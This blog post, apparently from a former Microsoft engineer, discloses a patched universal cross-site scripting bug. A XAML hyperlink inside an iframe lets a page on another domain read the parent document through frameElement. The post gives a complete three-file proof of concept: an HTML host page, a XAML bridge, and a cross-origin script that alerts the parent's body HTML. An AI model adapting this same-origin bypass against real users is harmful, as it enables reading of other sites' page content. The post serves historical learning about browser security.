UXSS - XAML frameElement

Loading a XAML file in an IFRAME and then clicking a hyperlink inside the XAML that targets a different-domain HTML page gives that HTML page access to frameElement. The XAML acts as an origin-neutral bridge: a hyperlink inside it can load any domain, and the loaded page doesn’t inherit the parent’s origin restrictions.

index.html:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDom_XAML_frameElement</title></head>
<body>
<center>
<font face="Tahoma" size="2">
<h1>xDom_XAML_frameElement</h1>
Very simple crossDomain using a xaml file as a "bridge" to get the frameElement:<br /><br />
</center>

1) Load any <b>xaml</b> inside an IFRAME. <font color="red">It doesn't matter if it is or not in a different domain</font>.<br />
2) That xaml has a link to an HTML <u>in a different domain</u>. Click on it.<br />
3) The HTML is able to read the frameElement with no restrictions at all.<br />
<br /><br />

<center>
<iframe src="I_CAN_BE_IN_ANY_DOMAIN.xaml" width="350" height="200" style="border:solid 1px;"></iframe><br /><br />
</center>
</font>
</body>
</html>

I_CAN_BE_IN_ANY_DOMAIN.xaml:

<Page xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" Title="xDom_XAML_frameElement">
	<TextBlock TextWrapping="Wrap">
		I am the file <Bold>I_CAN_BE_IN_ANY_DOMAIN.xaml</Bold> inside an IFRAME.
		<Hyperlink NavigateUri="http://www.iframe.com/crash/20/I_SHOUD_BE_IN_A_DIFFERENT_DOMAIN.html">
			Different Domain Page
		</Hyperlink>
	</TextBlock>
</Page>

I_SHOUD_BE_IN_A_DIFFERENT_DOMAIN.html (cross-origin page):

<script language="JavaScript">
alert(frameElement.ownerDocument.body.outerHTML);
</script>

When a XAML <Hyperlink> navigates the IFRAME to a different-domain HTML, the HTML ends up with an accessible frameElement. The XAML navigation doesn’t propagate the parent page’s origin context to the new document, leaving frameElement.ownerDocument readable without any same-origin check.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [UXSS - XML Feeds frameElement] :: [UXSS - SWF frameElement] >